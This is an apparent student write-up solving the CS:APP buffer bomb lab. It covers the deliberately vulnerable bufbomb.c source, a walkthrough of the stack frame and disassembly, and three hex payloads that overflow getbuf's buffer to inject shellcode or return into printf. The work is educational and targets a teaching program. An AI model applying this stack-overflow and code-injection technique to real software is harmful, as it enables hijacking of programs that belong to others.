csapp Buffer Bomb Lab

solution

I used the TDM-GCC 4.9.2 32-bit Debug compiler in Dev-C++. Newer versions of the compiler have added security optimizations, and since I couldn't outsmart them, I simply gave up.

Thought Process Analysis:

One-Sentence Summary:

Assembly knowledge is inescapable—you'll never get away from it in your lifetime.

Tools Needed:

Dev-C++ / Visual Studio
OllyDbg (or the special edition provided by “52pojie” community)

Source Code:

/* bufbomb.c
 *
 * Bomb program that is solved using a buffer overflow attack
 *
 * program for CS:APP problem 3.38
 *
 * used for CS 202 HW 8 part 2
 *
 * compile using
 *   gcc -g -O2 -Os -o bufbomb bufbomb.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>

/* Like gets, except that characters are typed as pairs of hex digits.
   Nondigit characters are ignored.  Stops when encounters newline */
char *getxs(char *dest)
{
  int c;
  int even = 1; /* Have read even number of digits */
  int otherd = 0; /* Other hex digit of pair */
  char *sp = dest;
  while ((c = getchar()) != EOF && c != '\n') {
    if (isxdigit(c)) {
      int val;
      if ('0' <= c && c <= '9')
	val = c - '0';
      else if ('A' <= c && c <= 'F')
	val = c - 'A' + 10;
      else
	val = c - 'a' + 10;
      if (even) {
	otherd = val;
	even = 0;
      } else {
	*sp++ = otherd * 16 + val;
	even = 1;
      }
    }
  }
  *sp++ = '\0';
  return dest;
}

int getbuf()
{
  char buf[16];
  getxs(buf);
  return 1;
}

void test()
{
  int val;
  printf("Type Hex string:");
  val = getbuf();
  printf("getbuf returned 0x%x\n", val);
}

int main()
{
  int buf[16];
  /* This little hack is an attempt to get the stack to be in a
     stable position
  */
  int offset = (((int) buf) & 0xFFF);   
  int *space = (int *) malloc(offset);  
  *space = 0; /* So that don't get complaint of unused variable */
  test();
  return 0;
}

Compared to the previous challenge, the code in this one is much more beginner-friendly. Even the seemingly long getxs function simply converts your input hexadecimal string into hexadecimal numbers and stores them in the buf buffer.

But then—what does this have to do with the return value of getbuf? I suddenly realized that getxs has no input length restriction, which means this is a straightforward buffer overflow.

However, during the Qiangwang Cup competition, I had just copy-pasted the Python exploit code without understanding the principle of overflow at all. That's when I began a long journey of learning.

Prerequisite Knowledge 1 — Assembly

Registers

eax ~ edx: General-purpose registers. They act as temporary storage for variables and can also be used for addressing.
esp: Stack pointer (points to the top of the stack).
ebp: Base pointer (points to the bottom of the stack frame).
eip: Instruction pointer (stores the address of the next instruction to execute — conceptually, the “line number” in code).

Instructions (Intel syntax as example)

mov: Copy instruction — assigns the value of the second operand to the first.
add: Adds the second operand to the first (similarly, sub = subtract, mul = multiply).
push: Pushes a value onto the stack and decreases esp by the size of the data type.
pop: Pops the top value from the stack into a register and increases esp by the size of the data type.
lea: Loads the address of the second operand into the first operand.
ptr: Type casting indicator.
ss: Refers to the stack segment register. Assembly has four segment registers:
- cs: Code segment
- ds: Data segment
- ss: Stack segment
- es: Extra segment Registers in different segments are independent, so they need to be distinguished.

For more details, see: Assembly Language Programming

Prerequisite Knowledge 2 — Stack Diagrams

Note: The stack is not an independent region. It is actually a part of memory that exists while the program is running! This means you can locate stack data directly in the memory window.

The stack follows the principle where the base address is higher and the top address is lower. Because of little-endian storage, the data we input accumulates from low to high addresses.

A stack diagram should include the current state (instruction), the contents of the stack, and the positions of the esp and ebp pointers. Ideally, use different colors to highlight how various operations affect the stack, making program flow clearer.

Drawing stack diagrams while analyzing assembly is a very good habit.

For more details, see: Stack Diagram 1 (Note: I checked the link—it's still alive and accessible.)

Solution

After a week of long study, I finally gained the ability to solve this problem.

Similar to ret2shellcode, we need to exploit the buffer overflow vulnerability in the getbuf function. The goal is to overwrite the return value with the string stored in buf. That way, when the function returns, the CPU jumps to the start of the string and executes the hexadecimal instructions embedded there. Afterward, execution flows back to the test function, producing the desired output.

("eax=deadbeef" + return test + "00" + ebp + head address)

Locating the Function Address

First, use Dev-C++ to debug the source file. Set a breakpoint at the getbuf function, press F5 to start debugging, then check the CPU window—what you see is the assembly code. On my machine, the starting address of this function was 0x4015c1. This is the entry point of the getbuf function.

Next, open the program in OllyDbg, press Ctrl+G to jump to this address, and the preparation work is done.

Analyzing the Assembly Code — updated on 1/17/2022

Update (1/17/2022): The way the stack diagram was drawn before was not very standard. Stack diagrams should follow the principle of higher addresses on top, lower addresses at the bottom.

We can see that the getbuf function occupies memory addresses from 0x4015c1 to 0x4015d8. Let's combine this with the stack diagram to understand what's happening:

4015c1: Copy the current base pointer (ebp) to the stack top, esp -= 4. This is essentially saving the pre-call state.
4015c2: Set ebp = esp. Both pointers now align.
4015c4: esp -= 40, reserving local space for data storage.
4015c7: Assign eax = ebp - 24, preparing to write a string.
4015ca: Push the value of eax onto the stack.
4015cd: Call getxs, which writes the string into the address stored in eax.
4015d2: Assign eax = 1.
4015d7: Leave (equivalent to mov esp, ebp and pop ebp), restoring the pre-call state.
4015d8: Return (equivalent to pop eip).

(Since the stack has already overflowed and program logic is altered, further drawing has little meaning here.)

Writing the Exploit (exp)

(You can think of this as manually writing simple assembly.)

Instructions to Execute

Since the program's return value is stored in eax, we need to modify eax. The command is:

mov eax,0xdeadbeef

Next, we must jump out of the getbuf function. To do this, we need to know the return address of getbuf. Debugging the test function in Dev-C++ shows its starting address as 0x4015d9. Looking at the assembly code, at 0x4015eb the function calls 0x4015c1 (getbuf), so the proper return address is the next line: 0x4015f0.

Since retn pops the top of the stack as the return value, we must push this modified return address, then return:

push 0x4015f0
retn

Every assembly instruction is a shorthand for its machine code. We must translate them into hex. You can use gcc or simply check in OllyDbg—the second column shows the machine code.

The result is:

b8 ef be ad de 68 f0 15 40 00 c3

Redirecting Control Flow

The second step is to hijack the normal return sequence and redirect it to our crafted code.

In the stack, esp stores the base address of the test function's stack frame. This value cannot be altered, otherwise the program will crash.

(In reality, this is because before returning there's a pop ebp operation—this must match the original value for symmetry. If you've watched the Bilibili video, it becomes clearer.)

Immediately after this base address, we fill in the starting address of the injected string. That way, when retn executes, it pops our crafted address into eip and jumps there.

From the stack diagram, ebp = 0x62fe38 and eip should be the intermediate eax value = 0x62fdf0.

So we append:

38 fe 62 00 f0 fd 62 00

Determining the Length

The buffer starts at 0x62fdf0—this is easy to confirm.

Some might assume that since buf has length 16 and our command is 11 bytes, we just pad 5 bytes of 00. But that's wrong—compilers reserve more space than expected. This is the same reason why in OI (Olympiad in Informatics) some problems seem solvable by RE but actually result in WA. Similarly, subtracting esp by 40 does not equal the exploit length.

The correct length is the length of the "code" section in the final stack diagram. Debugging to 0x4015ca (the 5th diagram), we see ebp = 0x62fe08.

Two addresses remain (4 bytes each), so the length is:

0x62fe08 - 0x62fdf0 + 8 = 32

Thus, we must fill:

32 - 8 - 11 = 13 bytes of 00

Final Answer

Combining everything, the final payload is:

b8 ef be ad de 68 f0 15 40 00 c3 
00 00 00 00 00 00 00 00 00 00 00 00 00 
38 fe 62 00 f0 fd 62 00

We successfully altered the program's control flow without causing errors.

Summary

System-level programming is truly no easy task—I'm starting to worry about my hairline.

~~The third security project—never (or never again) see you.~~

Here I am: officially still a high school senior, taking freshman-level courses, studying sophomore-level material, while tackling assignments from what used to be junior year. Sichuan University really is impressive—the course difficulty can match that of the C9 universities!

(Updated on 12/12)

(A relatively common and mainstream method, similar to ret2libc.)

A senior's alternative idea is: "00" + ebp + return test.printf + address of string + "deadbeef"

This approach is simpler, but you must know that printf's argument passing works by first taking the address, then directly appending an immediate value.

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
CC CC CC CC CC CC CC CC 
38 FE 62 00 01 16 40 00 11 40 40 00 EF BE AD DE

(Updated on 12/28)

In the programming class, the teacher's idea was: export the memory data between the input address and the val address inside the test function. Then simply modify the return address of getbuf to 0x4015f3, skipping the instruction that assigns eax to ebp - 0xC (which is where val is stored). Finally, in the input, directly modify the value at val's address to 0xdeadbeef.

Thus, the answer is:

DC FD 62 00 1C 43 B2 76 CC FF 62 00 C0 CC AC 76 
5C 0F ED 6A FE FF FF FF 
38 FE 62 00 F3 15 40 00 00 40 40 00 A4 68 3E 1C 
38 FE 62 00 10 76 AB 76 00 00 71 00 00 00 00 00 
58 0E 00 00 EF BE AD DE